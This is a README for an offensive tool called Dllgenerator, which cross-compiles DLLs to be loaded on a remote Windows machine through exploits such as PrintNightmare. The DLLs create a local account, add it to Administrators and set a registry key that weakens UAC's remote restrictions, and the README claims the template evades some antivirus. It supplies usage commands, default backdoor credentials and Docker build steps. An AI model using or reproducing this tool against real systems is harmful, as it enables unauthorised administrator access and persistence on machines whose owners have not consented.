Dllgenerator is a quick tool to generate DLL, it is designed to be quickly effective.
Sometimes you can only execute one DLL on a remote machine, and you have no connect back possible because of AV (like in the printnightmare exploit).
To bypass this you can :
- Create a local account
- Add your local account to Administrators ( or Administrateurs 🇫🇷)
- Disable UAC control
Seems easy no ? In fact it is ! But it's boring to keep one file somewhere and don't remember how it works. And one day you remove one line (uac for example) and you forgot it ..
Dllgenerator is based on a template file that (on july 2022) still bypass some AV. It takes your input and generate a sexy DLLFile with it. DLL is not encoded or whatever, but you may consider put it in a wrapper.
A cross compiler mingw-w64-gcc
is used by default but you can customise the --compiler
python generator.py
usage: generator.py [-h] [--action {create_user,add_to_group,unset_uac} [{create_user,add_to_group,unset_uac} ...]] [--username USERNAME] [--password PASSWORD] [--group GROUP]
[--wrapper WRAPPER] [--compiler compiler] [--output OUTPUT]
______ _ _ _
| _ | | | | |
| | | | | | __ _ ___ _ __ ___ _ __ __ _| |_ ___ _ __
| | | | | | / _` |/ _ | '_ \ / _ | '__/ _` | __/ _ \| '__|
| |/ /| | | | (_| | __| | | | __| | | (_| | || (_) | |
|___/ |_|_| \__, |\___|_| |_|\___|_| \__,_|\__\___/|_|
__/ |
Version : 1.0
Author : shoxxdj
-h, --help show this help message and exit
--action {create_user,add_to_group,unset_uac} [{create_user,add_to_group,unset_uac} ...]
Main action
--username USERNAME, -u USERNAME
Your username
--password PASSWORD, -p PASSWORD
Your password matching the rules
--group GROUP, -g GROUP
The group, tips for FR it's Administrateur
--wrapper WRAPPER, -w WRAPPER
A command wrapper
--compiler compiler, -c compiler
A C compiler : 'i686-w64-mingw32-gcc -lnetapi32' is an option
--output OUTPUT, -o OUTPUT
path and name of your dll
python generator.py --action create_user add_to_group unset_uac
This will :
- Create a local account : hoppy / H0pBreWedW1thl0v3
- Add the account hoppy to group Administrators
- Set the regitry key to disable the functionnality in UAC that prevent remote connection
- Output as hoppy.dll in local directory
python generator.py --action create_user add_to_group -u malt -p Il0v3b33r5 -g BrewersGroup -o /tmp/beer.dll
This will :
- Create a local account malt / Il0v3b33r5
- Add the account malt to BrewersGroup
- Output to /tmp as beer.dll
docker build -t dllgenerator .
docker run -it --rm -v $PWD:/dllgenerator dllgenerator:latest --action create_user add_to_group unset_uac --output ./test.dll
- Don't forget to clean the target machine ! Delete the user and delete the registry key if created
- Don't use a password with a length > 14 characters, it will prompt for an input and dll will fail to add user
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy